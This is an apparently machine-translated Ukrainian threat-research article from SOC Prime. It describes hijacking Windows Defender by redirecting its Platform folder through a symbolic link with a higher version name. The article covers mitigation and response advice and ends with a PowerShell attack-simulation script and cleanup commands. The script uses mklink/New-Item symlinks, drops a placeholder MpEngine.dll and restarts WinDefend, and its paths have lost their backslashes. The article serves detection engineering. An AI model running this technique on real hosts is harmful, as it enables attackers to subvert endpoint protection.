SOC Prime Bias: Критичний

14 Jan 2026 14:55 UTC

Зламати Захисну Оболонку Windows Defender за Допомогою Техніки Перенаправлення Папок

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Зламати Захисну Оболонку Windows Defender за Допомогою Техніки Перенаправлення Папок
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Стаття демонструє метод перехоплення Windows Defender, що використовує перенаправлення папки шляхом розміщення символічного посилання-директорії всередині шляху платформи Defender та спрямування його на розташування, котре контролює атакуючий. Призначивши папці символічного посилання вищий номер “версії”, ніж у легітимного каталогу платформи, Defender може вибрати шлях, що контролюється атакуючим, після перезавантаження та завантажити його компоненти звідти. Це створює можливості для динамічного стороннього завантаження DLL, вибіркового видалення файлів, або навіть порушення роботи служби Defender.

Розслідування

Робочий процес автора копіює активну папку платформи Defender у тимчасову директорію, підконтрольну атакуючому, а потім створює в платформі символічне посилання-директорію (за допомогою mklink /D), використовуючи сфабрикований ідентифікатор вищої версії. Після перезавантаження спостерігається виконання Defender з перенаправленої директорії, що дає змогу подальшим діям, таким як захоплення DLL або видалення виконуваних файлів для втручання у запуск і захист Defender.

Пом’якшення

Мінімізуйте ризик, суворо обмежуючи дозволи на запис у директорії платформи Windows Defender та контролюючи підозріле створення символічних посилань або несподіваних підкаталогів у стилі “версії”. Реалізуйте контроль цілісності для бінарних файлів Defender і створюйте сповіщення про зміни у шляху виконуваних файлів або вибір платформи-директорії. За можливості, застосовуйте контроль програми Windows Defender (WDAC) або еквівалентні політики посилення безпеки, щоб запобігти несанкціонованим змінам в захищених системних локаціях.

Реакція

Створіть сповіщення, коли з’являються нові символічні посилання під C:ProgramDataMicrosoftWindows DefenderPlatform або коли mklink використовується для цієї директорії. Перевірте цілісність файлів Defender та підтвердіть, що виконувані файли походять з очікуваної директорії платформи. Якщо втручання підтверджено, видаліть зловмисне символічне посилання та відновіть файли платформи Defender з надійного джерела, потім перезавантажте служби Defender та перевірте захист по всьому хосту.

Потік атаки

Імітаційне виконання

Передумова: Телеметрія та перевірка базових показників повинні бути успішними.

Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), яке має на меті активувати правило виявлення. Команди та пояснення МАЮТЬ прямо відображати ідентифіковані TTPs та забезпечувати отримання тієї ж телеметрії, яка очікується засобами виявлення. Абстрактні або не пов’язані приклади призведуть до хибних діагнозів.

  • Опис нападу та команди:
    Нападник скомпрометував обліковий запис користувача з низькими привілеями на цільовому хості. Їхня мета — завантажити зловмисне навантаження під час запуску Windows Defender шляхом перенаправлення папки “Platform” Defender у підконтрольне їм місце. Вони виконують наступні кроки:

    1. Створити директорію для підготовки (C:TMPAV) яка буде містити зловмисні DLL.
    2. Заповнити директорію для підготовки створеним DLL з іменем MpEngine.dll (ім’я, очікуване Defender).
    3. Створити символічне посилання-директорію з назвою C:ProgramDataMicrosoftWindows DefenderPlatform{random} що вказує на директорію для підготовки, використовуючи як нативну утиліту mklink (щоб активувати правило Sigma), так і PowerShell New‑Item (для перевірки обхідного шляху).
    4. Перезапустити сервіс Windows Defender для примусового завантаження з перехопленого шляху.
  • Скрипт повторного тестування:

    # ==============================
    #  Імітація перехоплення папки
    # ==============================
    $defenderPlatform = "C:ProgramDataMicrosoftWindows DefenderPlatform"
    $attackerStaging = "C:TMPAV"
    $linkName = "$defenderPlatformHijackTarget"
    
    # 1. Підготовка папки для підготовки
    New-Item -Path $attackerStaging -ItemType Directory -Force | Out-Null
    
    # 2. Додавання пробного шкідливого DLL (заповнювач)
    $dummyDll = "$attackerStagingMpEngine.dll"
    Set-Content -Path $dummyDll -Value "MALICIOUS DLL CONTENT" -Encoding ASCII
    
    # 3a. Створення символічного посилання через нативний mklink (активує правило Sigma)
    cmd /c "mklink /D `"$linkName`" `"$attackerStaging`""
    
    # 3b. Створення символічного посилання через PowerShell (тестує обхідне правило)
    $psLink = "$defenderPlatformHijackTarget_PS"
    New-Item -ItemType SymbolicLink -Path $psLink -Target $attackerStaging -Force
    
    # 4. Перезапуск служби Windows Defender (вимагає прав адміністратора)
    # Примітка: Цей крок може бути заблокований у захищеному середовищі; включено для повноти.
    Restart-Service -Name "WinDefend" -Force
  • Команди для очищення:

    # Видалити створені символічні посилання та файли для підготовки
    $links = @(
        "C:ProgramDataMicrosoftWindows DefenderPlatformHijackTarget",
        "C:ProgramDataMicrosoftWindows DefenderPlatformHijackTarget_PS"
    )
    foreach ($l in $links) {
        if (Test-Path $l) { Remove-Item $l -Force }
    }
    
    $staging = "C:TMPAV"
    if (Test-Path $staging) { Remove-Item $staging -Recurse -Force }
    
    # При необхідності відновити папку платформи Defender (не потрібно для симуляції)